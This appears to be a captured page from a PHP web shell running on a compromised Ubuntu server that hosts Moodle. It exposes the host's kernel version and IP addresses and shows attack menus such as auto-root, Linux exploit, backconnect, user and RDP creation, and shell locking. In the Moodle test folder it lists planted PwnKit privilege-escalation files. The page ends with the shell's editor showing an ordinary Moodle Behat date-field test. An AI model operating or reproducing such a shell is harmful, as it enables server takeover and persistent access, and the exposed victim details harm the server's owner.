Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
action_menu.feature
1.11
KB
-rwxrwxrwx
action_modal.feature
2.19
KB
-rwxrwxrwx
alpha_chooser.feature
21.29
KB
-rwxrwxrwx
app_behat_runtime.js
24.63
KB
-rwxrwxrwx
behat_action_menu.php
8.02
KB
-rwxrwxrwx
behat_app.php
21.51
KB
-rwxrwxrwx
behat_data_generators.php
9.71
KB
-rwxrwxrwx
behat_deprecated.php
6.48
KB
-rwxrwxrwx
behat_filters.php
2.95
KB
-rwxrwxrwx
behat_forms.php
29.89
KB
-rwxrwxrwx
behat_general.php
89.95
KB
-rwxrwxrwx
behat_hooks.php
33.02
KB
-rwxrwxrwx
behat_navigation.php
45.76
KB
-rwxrwxrwx
behat_permissions.php
12.47
KB
-rwxrwxrwx
behat_transformations.php
5.56
KB
-rwxrwxrwx
datetime_any.feature
4.09
KB
-rwxrwxrwx
largeforms.feature
4.45
KB
-rwxrwxrwx
locking.feature
8.26
KB
-rwxrwxrwx
min_max_version.feature
1
KB
-rwxrwxrwx
permissionmanager.feature
2.61
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
readonlyform.feature
1.63
KB
-rwxrwxrwx
securelayout.feature
1.68
KB
-rwxrwxrwx
timezone.feature
431
B
-rwxrwxrwx
userfeedback.feature
2.21
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : datetime_any.feature
@core @javascript @core_form Feature: Any day / month / year combination in date form elements works ok. In order to use date / datetime elements with Behat as a user Any day / month / year combination must work ok @javascript Scenario Outline: Verify that setting any date / datetime is possible with enabled fields Given the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "activity" exist: | activity | name | intro | course | idnumber | | assign | Assignment 01 | Assign activity to test some dates | C1 | assign01 | And I am on the "Assignment 01" "assign activity editing" page logged in as admin And I expand all fieldsets And I set the field "Due date" to "<initial_date>" And I set the field "Due date" to "<final_date>" When I press "Save and display" Then I should see "<date_result>" in the "Due date" "table_row" Examples: | initial_date | final_date | date_result | case_explanation (times Australia/Perth) | | ##today## | ##tomorrow noon## | ##tomorrow noon##%A, %d %B %Y, %I:%M## | change of day, any day, back and forth | | ##tomorrow## | ##today noon## | ##today noon##%A, %d %B %Y, %I:%M## | | | 1617256800 | 1617170400 | Wednesday, 31 March 2021, 2:00 | change of month, back and forth | | 1617170400 | 1617256800 | Thursday, 1 April 2021, 2:00 | | | 1740808800 | 1709186400 | Thursday, 29 February 2024, 2:00 | change of month, leap year, back and forth | | 1709186400 | 1740808800 | Saturday, 1 March 2025, 2:00 | | | 1577858400 | 1577772000 | Tuesday, 31 December 2019, 2:00 | change of year, back and forth | | 1577772000 | 1577858400 | Wednesday, 1 January 2020, 2:00 | | @javascript Scenario Outline: Verify that setting any date / datetime is possible with disabled fields Given the following "courses" exist: | fullname | shortname | format | | Course 1 | C1 | topics | And the following "activity" exist: | activity | name | intro | course | idnumber | | assign | Assignment 01 | Assign activity to test some dates | C1 | assign01 | And I am on the "Assignment 01" "assign activity editing" page logged in as admin And I expand all fieldsets And I set the field "Due date" to "<initial_date>" And I set the field "Due date" to "disabled" And I set the field "Due date" to "<final_date>" When I press "Save and display" Then I should see "<date_result>" in the "Due date" "table_row" Examples: | initial_date | final_date | date_result | case_explanation (times Australia/Perth) | | ##today## | ##tomorrow noon## | ##tomorrow noon##%A, %d %B %Y, %I:%M## | change of day, any day, back and forth | | ##tomorrow## | ##today noon## | ##today noon##%A, %d %B %Y, %I:%M## | | | 1617256800 | 1617170400 | Wednesday, 31 March 2021, 2:00 | change of month, back and forth | | 1617170400 | 1617256800 | Thursday, 1 April 2021, 2:00 | | | 1740808800 | 1709186400 | Thursday, 29 February 2024, 2:00 | change of month, leap year, back and forth | | 1709186400 | 1740808800 | Saturday, 1 March 2025, 2:00 | | | 1577858400 | 1577772000 | Tuesday, 31 December 2019, 2:00 | change of year, back and forth | | 1577772000 | 1577858400 | Wednesday, 1 January 2020, 2:00 | |
Close